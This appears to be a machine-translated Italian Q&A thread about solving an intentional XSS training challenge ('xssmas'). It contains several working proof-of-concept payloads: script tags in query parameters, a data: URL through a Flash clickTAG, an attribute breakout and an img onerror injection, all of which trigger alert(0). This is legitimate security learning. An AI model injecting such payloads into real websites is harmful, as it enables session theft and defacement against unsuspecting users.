Come può essere risolta questa sfida xss? [chiuso]

Naviga le tue risposte
0

Ho trovato questo: link

E finora le mie soluzioni erano: 

1.http://research.insecurelabs.org/xssmas/search.php?query=<script>alert(0)</script>
2. http://research.insecurelabs.org/xssmas/xssmas.swf?clickTAG=data:text/html,<script>alert(0)</script>

ma sembrano esserci cinque soluzioni. Nessuno mi aiuta Sto cercando di saperne di più su XSS. grazie 

UPDATED:

I know that two other solutions are related to this:
1.
<script>
var n = '';
if (n != '') {
    $(function() {
        $("h1").html("Merry XSSmas, " + unescape(n) + "!");
    });
}
</script>

2.


<script>
<!-- Analytics: no change below this line -->
document.write('<img src="analytics?url=">');
</script>

Update solved no2:

http://research.insecurelabs.org/xssmas/?url=maxa"><fake></script><script>alert(0)</script>
    
posta Daniel 28.12.2012 - 00:15
fonte

3 risposte

3

Se stai cercando di imparare, chiedere ad altri di rispondere alla domanda per te sembra controproducente.

Dai un'occhiata a cheatsheet e altro materiale per lavorare su tutto.

    
risposta data 28.12.2012 - 01:01
fonte
1

Anche se sono assolutamente d'accordo con tutti coloro che hanno detto che dal momento che questa è una sfida e dovresti risolverla da sola, devo dire che questo è, dopotutto, un sito Q & A. Hai fatto una domanda e, se posso, risponderò. Quello che fai con quella risposta è sotto la tua responsabilità.

Detto questo, ti consiglio di continuare a leggere solo se ci hai provato molto e non hai trovato una risposta.

Dopo alcuni fuzzing ho scoperto che c'è qualcosa di interessante in research.insecurelabs.org/xssmas/index/analytics , sembra che gli sia passato qualcosa ( analytics?SOMETHING ) è scritto qui document.write('<img src="analytics?url=SOMETHING">');

Provare con .../xssmas/index/analytics?<script>alert(0)</script> non ha prodotto alcun risultato, quindi ho deciso di testare il classico onerror : 

.../xssmas/index/analytics?<img src="giveMe404" onerror="alert(0)">

E ha funzionato.

Buona fortuna a trovare il resto!

    
risposta data 28.12.2012 - 15:24
fonte
0

Trying with .../xssmas/index/analytics?<script>alert(0)</script> yielded no result, so I decided to test the classic onerror:

Dovresti immaginare un aspetto simile allo script della pagina del server ... potrebbe essere in questo modo:

<script> <!-- Analytics: no change below this line --> document.write('<img src="analytics?url=<?php echo $variable; ?>">'); </script>

Il tuo esempio funzionerebbe ma hai bisogno di "cancellare" il resto del codice JS non necessario - Voglio dire: ">');

    
risposta data 28.12.2012 - 16:22
fonte

Leggi altre domande sui tag

Rifiuta gli amministratori di domini dal furto di file utente su PC [duplicato] Strumenti dinamici per rilevare le vulnerabilità nelle applicazioni software scritte in c?